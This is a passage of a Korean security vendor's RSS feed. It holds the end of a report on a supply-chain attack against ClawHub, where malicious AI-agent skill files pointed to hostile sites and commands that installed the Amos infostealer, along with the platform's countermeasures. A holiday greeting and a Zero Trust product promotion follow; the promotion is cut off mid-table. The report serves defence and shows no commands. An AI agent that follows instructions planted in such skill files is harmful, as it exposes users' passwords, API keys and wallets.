&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1294&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/mmyM4/dJMcabJU3Ca/bBWgDK83v7kUWRNwRjRyek/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/mmyM4/dJMcabJU3Ca/bBWgDK83v7kUWRNwRjRyek/img.png&quot; data-alt=&quot;[그림 3] SKILL.md파일에 안내된 악성 사이트 및 악성 명령어&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/mmyM4/dJMcabJU3Ca/bBWgDK83v7kUWRNwRjRyek/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmmyM4%2FdJMcabJU3Ca%2FbBWgDK83v7kUWRNwRjRyek%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1294&quot; height=&quot;720&quot; data-origin-width=&quot;1294&quot; data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] SKILL.md파일에 안내된 악성 사이트 및 악성 명령어&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;공격 피해 범위&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최종적으로 다운로드 된 페이로드는 정보 탈취형 악성코드인 &lt;span&gt;Amos&lt;/span&gt;로 확인되었으며&lt;span&gt;, &lt;/span&gt;이로 인해&amp;nbsp;에이전트가 설치된 디바이스에서 발생할 수 있는 위협은 다음과 같습니다.&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;정보 탈취: 문서, 암호, API 키 등 민감 정보 유출&lt;/li&gt;
&lt;li&gt;원격&amp;nbsp;명령&amp;nbsp;실행:&amp;nbsp;공격자의&amp;nbsp;명령으로&amp;nbsp;추가&amp;nbsp;악성&amp;nbsp;코드&amp;nbsp;설치&amp;nbsp;가능&lt;/li&gt;
&lt;li&gt;암호화폐&amp;nbsp;자산&amp;nbsp;노출:&amp;nbsp;암호화폐&amp;nbsp;관련&amp;nbsp;도구로&amp;nbsp;위장한&amp;nbsp;스킬을&amp;nbsp;통해&amp;nbsp;지갑&amp;nbsp;정보&amp;nbsp;접근&amp;nbsp;시도&lt;/li&gt;
&lt;li&gt;측면 이동 가능성&amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;대응 현황&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티는 새로운 보안 위협이 확장 됨에 따라 해당 공급망을 감시하고 있으며&lt;span&gt;, &lt;/span&gt;모니터링 이후 동일 공격자의 소행으로 보이는 정보 탈취 악성코드 배포 공격을 빠르게 감지&lt;span&gt;, &lt;/span&gt;신고 및 자사 제품에 반영하여 사용자는 물론 커뮤니티와 생태계에 기여하고 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현재 이러한 공격을 인지한 &lt;span&gt;ClawHub&lt;/span&gt;에서는 다음과 같은 조치를 취하고 있습니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;스킬 검증 강화&lt;/b&gt; :&lt;br /&gt;업로드되는 모든 스킬을 VirusTotal과 연동 및 ClawHub 자체 엔진을 통해 자동 스캔하는 시스템을 도입했습니다. 악성 코드가 포함된 패키지는 사전 차단되거나 경고가 표시됩니다. &lt;br /&gt;ClawHub 내부적으로는 스킬에 대해 평가하는 시스템을 구축하여 목적,능력, 지침범위,설치 방식, 신원, 지속성 및 권한 등에 대한 평가를 확인 할 수 있습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;385&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/deiV3M/dJMcahi4qvB/aVSSdKWkU4QNzXiXN2bwPk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/deiV3M/dJMcahi4qvB/aVSSdKWkU4QNzXiXN2bwPk/img.jpg&quot; data-alt=&quot;[그림 4] VirusTotal 및 OpenClaw 스캔 결과 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/deiV3M/dJMcahi4qvB/aVSSdKWkU4QNzXiXN2bwPk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdeiV3M%2FdJMcahi4qvB%2FaVSSdKWkU4QNzXiXN2bwPk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;800&quot; height=&quot;385&quot; data-origin-width=&quot;800&quot; data-origin-height=&quot;385&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 4] VirusTotal 및 OpenClaw 스캔 결과 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;업로더&amp;nbsp;검증&amp;nbsp;강화&lt;/b&gt; &lt;br /&gt;일정&amp;nbsp;기간&amp;nbsp;활동한&amp;nbsp;GitHub&amp;nbsp;계정을&amp;nbsp;보유한&amp;nbsp;업로더만&amp;nbsp;스킬을&amp;nbsp;게시할&amp;nbsp;수&amp;nbsp;있도록&amp;nbsp;제한했으며,&amp;nbsp;사용자&amp;nbsp;신고&amp;nbsp;기능도&amp;nbsp;추가되었습니다.&lt;/li&gt;
&lt;li&gt;&lt;b&gt;사용자&amp;nbsp;주의&amp;nbsp;권고&lt;/b&gt; &lt;br /&gt;외부&amp;nbsp;명령&amp;nbsp;실행을&amp;nbsp;요구하는&amp;nbsp;스킬&amp;nbsp;설치&amp;nbsp;시&amp;nbsp;신중한&amp;nbsp;검토가&amp;nbsp;필요하며,&amp;nbsp;검증되지&amp;nbsp;않은&amp;nbsp;스킬&amp;nbsp;설치는&amp;nbsp;지양할&amp;nbsp;것을&amp;nbsp;권고하고&amp;nbsp;있습니다.&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번&lt;span&gt; ClawHub &lt;/span&gt;공급망 공격은&lt;span&gt; npm, PyPI &lt;/span&gt;등 전통적인 패키지 저장소에서 발생하던 공급망 공격이&lt;span&gt; AI &lt;/span&gt;에이전트 확장 생태계로 확산되었음을 보여줍니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;AI &lt;/span&gt;기반 도구의 활용이 증가하는 만큼&lt;span&gt;, &lt;/span&gt;개발자와 사용자 모두 기본적인 보안 수칙을 준수하고 공급망 위협에 대한 경각심을 유지해야 할 것입니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;참고 출처&lt;span&gt;:&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;a href=&quot;https://www.kucoin.com/news/flash/slowmist-reports-large-scale-supply-chain-poisoning-attack-on-openclaw-s-clawhub?utm_source=chatgpt.com&quot;&gt;https://www.kucoin.com/news/flash/slowmist-reports-large-scale-supply-chain-poisoning-attack-on-openclaw-s-clawhub?utm_source=chatgpt.com&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;&gt;&lt;a href=&quot;https://www.estsecurity.com/&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cFdp3x/dJMcagEsrqT/sO8fW41QxRzlRTBhWmdidk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcFdp3x%2FdJMcagEsrqT%2FsO8fW41QxRzlRTBhWmdidk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;400&quot; height=&quot;150&quot; data-origin-width=&quot;400&quot; data-origin-height=&quot;150&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>국내외 보안동향</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5726</guid>
      <comments>https://alyacofficialblog.tistory.com/5726#entry5726comment</comments>
      <pubDate>Thu, 12 Feb 2026 18:04:02 +0900</pubDate>
    </item>
    <item>
      <title>이스트시큐리티와 함께 안전한 2026년 보내세요!</title>
      <link>https://alyacofficialblog.tistory.com/5717</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384093 (1).png&quot; data-origin-width=&quot;1500&quot; data-origin-height=&quot;1875&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/3kl1z/dJMcac9NueB/AyfoU6ocyquqoUQYQ43DS0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/3kl1z/dJMcac9NueB/AyfoU6ocyquqoUQYQ43DS0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/3kl1z/dJMcac9NueB/AyfoU6ocyquqoUQYQ43DS0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F3kl1z%2FdJMcac9NueB%2FAyfoU6ocyquqoUQYQ43DS0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1500&quot; height=&quot;1875&quot; data-filename=&quot;Group 2034384093 (1).png&quot; data-origin-width=&quot;1500&quot; data-origin-height=&quot;1875&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티를 아껴주시고 함께해 주신 모든 분들께 2026 병오년 설 명절을 맞아 깊은 감사의 인사를 드립니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;지난 한 해 동안 보내주신 신뢰와 응원 덕분에 이스트시큐리티는 빠르게 변화하는 보안 환경 속에서도 한 걸음 더 성장할 수 있었습니다. 고객과 파트너 여러분과 함께 만들어 온 모든 순간은 저희에게 큰 의미이자 앞으로 나아가기 위한 소중한 밑거름이 되었습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;2026년에도 이스트시큐리티는 보다 가까이에서 소통하며, 변화하는 위협에 선제적으로 대응하는 신뢰받는 보안 파트너로서 더 안전한 디지털 환경을 만들어 나가겠습니다!&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;풍요롭고 따뜻한 설 연휴 보내시길 바라며, 새해에도 건강과 행복이 늘 함께하시길 기원합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;감사합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티 드림&lt;/span&gt;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>2026년</category>
      <category>기업보안</category>
      <category>병오년</category>
      <category>알약</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5717</guid>
      <comments>https://alyacofficialblog.tistory.com/5717#entry5717comment</comments>
      <pubDate>Thu, 12 Feb 2026 17:00:52 +0900</pubDate>
    </item>
    <item>
      <title>제로트러스트 보안 전환을 위한 '알약 ZePP' 핵심 포인트</title>
      <link>https://alyacofficialblog.tistory.com/5725</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;오늘날 기업의 보안 환경은 급격하게 변화하고 있습니다. 클라우드 전환, 원격 근무 확대, BYOD 도입 등으로 '네트워크 경계'라는 개념이 사라지고 있고, 한 번 인증을 통과하면 내부를 신뢰하는 기존 보안 모델로는 더 이상 지능화된 위협에 대응하기 어려운 시대가 되었습니다. &lt;/span&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이제 보안의 기본 전제는&lt;b&gt; *&lt;/b&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;제로트러스트(Zero Trust)&lt;/span&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;로 전환되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;*제로트러스트(Zero Trust)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;기존의 경계 기반 보안처럼 내부 사용자를 신뢰하는 방식이 아니라, 네트워크 안팎을 구분하지 않고 모든 사용자&amp;middot;기기&amp;middot;접속 요청을 지속적으로 검증하는 보안 모델입니다. &lt;i&gt;&lt;u&gt;&amp;ldquo;절대 신뢰하지 말고, 항상 검증하라(Never Trust, Always Verify)&amp;rdquo;&lt;/u&gt;&lt;/i&gt;는 원칙을 기반으로 하며, 다단계 인증(MFA), 최소 권한 원칙(Least Privilege), 지속적 모니터링 등을 통해 내부 침해 및 계정 탈취 위협을 최소화합니다.&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;오늘은 제로트러스트 보안을 실현하는 이스트시큐리티의 통합 보안 플랫폼, &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-zepp&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;'알약 ZePP'&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;의 핵심 기능과 도입 효과를 소개합니다. 조직의 보안 체계 전환을 고민하고 계시다면, 끝까지 읽어보시고 실질적인 인사이트를 얻어가시길 바랍니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1402&quot; data-origin-height=&quot;902&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c361xe/dJMcaaKXTKL/QkYNugaPVLlMUfSQJzibD1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c361xe/dJMcaaKXTKL/QkYNugaPVLlMUfSQJzibD1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c361xe/dJMcaaKXTKL/QkYNugaPVLlMUfSQJzibD1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc361xe%2FdJMcaaKXTKL%2FQkYNugaPVLlMUfSQJzibD1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1402&quot; height=&quot;902&quot; data-origin-width=&quot;1402&quot; data-origin-height=&quot;902&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;b&gt;왜 제로트러스트인가? &amp;mdash; 기존 경계형 보안의 한계&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  &lt;/b&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;'내부는 안전하다'는 전제의 붕괴&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;기존 보안 모델은 방화벽과 VPN을 중심으로 내부 네트워크를 신뢰하는 구조였습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;그러나 원격 근무와 클라우드 환경이 확산되면서 내부와 외부의 경계가 모호해졌고, 내부에 침투한 위협이 자유롭게 확산되는 이른바 '내부 횡이동(Lateral Movement)' 공격이 급증하고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;  한 번의 인증만으로 내부 자원에 무제한 접근을 허용하는 구조는 더 이상 안전하지 않습니다&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  &lt;/b&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;VPN 기반 접근 제어의 한계&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;VPN은 연결 시점에만 인증을 수행하고, 이후에는 별도의 검증 없이 내부 네트워크 전체에 접근할 수 있는 구조입니다. 이는 단말이 악성코드에 감염되거나 비인가 사용자가 접속하더라도 내부 확산을 막기 어렵다는 근본적인 한계를 가지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;  접근 시점뿐만 아니라, 접근 중에도 지속적으로 신뢰를 검증하는 체계가 필요합니다.&lt;/span&gt;&lt;/blockquote&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&amp;nbsp;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  &lt;/b&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;분산된 보안 정책의 관리 부담&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;엔드포인트 보안, 네트워크 보안, 접근 제어 등이 각각 독립적으로 운영되다 보니 정책의 일관성을 유지하기 어렵고, 보안 사각지대가 발생하기 쉽습니다. 특히 조직 규모가 커질수록 관리 복잡성이 기하급수적으로 증가합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d; font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;  엔드포인트, 네트워크, 애플리케이션 접근 정책을 하나의 플랫폼에서 통합 관리하는 것이 효율적입니다.&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이러한 한계를 극복하기 위해, 글로벌 보안 기준은 이미 '경계형 보안'에서 '제로트러스트'로 빠르게 전환되고 있습니다. NIST SP 800-207과 KISA 제로트러스트 가이드라인 2.0이 발표되면서 공공기관과 기업 모두에서 제로트러스트 도입이 가속화되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;table&quot;&gt;
&lt;p style=&quot;font-weight: color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #f6e199;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;  &lt;/span&gt;한눈에 비교하기 - 경계형 보안 vs제로트러스트&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;font-weight: color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;width: 100%; border-collapse: collapse; line-height: 1.6; font-size: 14px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 29.6512%; color: #444444; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;구분&lt;/b&gt;&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 34.7674%; color: #444444; background-color: #fcfcfc;&quot;&gt;&lt;b&gt;기존 경계형 보안&lt;/b&gt;&lt;/th&gt;
